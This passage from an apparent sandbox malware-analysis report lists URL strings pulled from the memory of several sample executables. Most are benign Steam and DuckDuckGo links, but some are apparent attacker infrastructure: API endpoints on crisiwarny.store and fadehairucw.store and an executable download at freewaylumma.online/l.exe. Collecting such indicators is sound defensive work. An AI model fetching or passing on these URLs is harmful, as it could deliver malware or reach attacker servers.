Source: 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000A88000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003704731.00000000014CF000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000A88000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000A88000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000A88000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=KLqJaM1v
Source: 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000A88000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=_zjj
Source: 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=0IXKH44IpF1u&l=english
Source: 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
Source: 4136f86ac7.exe, 0000001E.00000002.3114512417.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2993729821.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=1vfyNnvUqkgy&l=engl
Source: 4136f86ac7.exe, 0000001E.00000002.3114512417.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2993729821.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
Source: 4136f86ac7.exe, 0000001E.00000002.3114512417.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2993729821.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=f9Xv_dG_70Ca&l=english
Source: 4136f86ac7.exe, 0000001E.00000002.3114512417.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2993729821.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=Gr5o1d5GQef0&l=en
Source: 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
Source: 4136f86ac7.exe, 0000001E.00000002.3114512417.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2993729821.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
Source: 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
Source: 4136f86ac7.exe, 0000001E.00000002.3114512417.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2993729821.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=IJn7qVh5q-RP&l=e
Source: 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2993729821.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=HNbD--FePQTr&l=english
Source: 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=ij4Q-MLeHxnJ&l=engl
Source: 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2993729821.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=2VOT8-1_tx9Q&l=en
Source: 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2993729821.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=fK65ckRAjZr-&
Source: 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
Source: 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&amp
Source: 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=oaWa21XUbd8h&am
Source: 4136f86ac7.exe, 0000001E.00000002.3114512417.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2993729821.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
Source: 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
Source: 4136f86ac7.exe, 0000001E.00000003.2929916767.0000000005604000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2929730577.00000000055F5000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2929560709.00000000055EF000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2918822463.00000000055EE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4Lb
Source: file.exe, 00000000.00000002.2441472631.0000000023721000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2787061831.000000000137C000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3109019791.0000000005CAA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: file.exe, 00000000.00000002.2441472631.0000000023721000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2787061831.000000000137C000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3090918742.0000000005CAC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: powershell.exe, 00000019.00000002.2894050768.00000000055DB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000019.00000002.2894050768.00000000055DB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000019.00000002.2894050768.00000000055DB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: 4136f86ac7.exe, 00000025.00000003.2988825981.00000000014EB000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.2988565217.00000000014E9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store/
Source: 4136f86ac7.exe, 00000025.00000003.2988825981.00000000014EB000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.2988565217.00000000014E9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store/8
Source: 4136f86ac7.exe, 00000025.00000003.2988565217.00000000014D5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store:443/apiv
Source: file.exe, 00000000.00000003.2182267963.000000000115F000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2768067586.0000000005AC8000.00000004.00000800.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2757140206.0000000005AA8000.00000004.00000800.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2768191917.0000000005ABF000.00000004.00000800.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2756813608.0000000005AAB000.00000004.00000800.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2756924614.0000000005AA8000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2878671874.0000000005639000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2891340741.0000000005647000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2878901520.0000000005636000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2880010131.0000000005636000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2890694002.00000000056E3000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3057598446.0000000005C4F000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3056712909.0000000005D13000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3039312521.0000000005C48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000003.2182267963.000000000115F000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2768067586.0000000005AC8000.00000004.00000800.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2757140206.0000000005AA8000.00000004.00000800.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2768191917.0000000005ABF000.00000004.00000800.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2756813608.0000000005AAB000.00000004.00000800.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2756924614.0000000005AA8000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2878671874.0000000005639000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2891340741.0000000005647000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2878901520.0000000005636000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2880010131.0000000005636000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2890694002.00000000056E3000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3057598446.0000000005C4F000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3056712909.0000000005D13000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3039312521.0000000005C48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000003.2182267963.000000000115F000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2768067586.0000000005AC8000.00000004.00000800.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2757140206.0000000005AA8000.00000004.00000800.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2768191917.0000000005ABF000.00000004.00000800.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2756813608.0000000005AAB000.00000004.00000800.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2756924614.0000000005AA8000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2878671874.0000000005639000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2891340741.0000000005647000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2878901520.0000000005636000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2880010131.0000000005636000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2890694002.00000000056E3000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3057598446.0000000005C4F000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3056712909.0000000005D13000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3039312521.0000000005C48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 4136f86ac7.exe, 00000025.00000003.2988825981.00000000014EB000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.2988565217.00000000014E9000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.2988565217.00000000014D5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fadehairucw.store/
Source: 4136f86ac7.exe, 00000025.00000003.2988825981.00000000014EB000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.2988565217.00000000014E9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fadehairucw.store/N
Source: 4136f86ac7.exe, 00000025.00000003.2988565217.00000000014D0000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.2988565217.00000000014D5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fadehairucw.store/api
Source: 4136f86ac7.exe, 00000025.00000003.2988565217.00000000014D5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fadehairucw.store/apiA
Source: 4136f86ac7.exe, 00000025.00000003.3003704731.00000000014D5000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.2988565217.00000000014D5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fadehairucw.store:443/api
Source: skotes.exe, 00000017.00000002.3297166595.000000000150A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://freewaylumma.online/
Source: skotes.exe, 00000017.00000003.2782531663.000000000155B000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000017.00000003.2773430604.0000000001557000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://freewaylumma.online/cgi-sys/suspendedpage.cgi
Source: skotes.exe, 00000017.00000003.2773430604.0000000001557000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000017.00000002.3297166595.000000000150A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://freewaylumma.online/l.exe
Source: skotes.exe, 00000017.00000002.3297166595.000000000150A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://freewaylumma.online/l.exe1S=2Of
Source: skotes.exe, 00000017.00000002.3297166595.000000000150A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://freewaylumma.online/l.exee
Source: skotes.exe, 00000017.00000002.3297166595.000000000150A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://freewaylumma.online/l.exee9c09
Source: skotes.exe, 00000017.00000002.3297166595.000000000150A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://freewaylumma.online/l.exee9c09317)
Source: skotes.exe, 00000017.00000002.3297166595.000000000150A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://freewaylumma.online/l.exehpy
Source: skotes.exe, 00000017.00000002.3297166595.000000000150A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://freewaylumma.online/l.exene
Source: skotes.exe, 00000017.00000002.3297166595.000000000150A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://freewaylumma.online/l.exes1CALAP
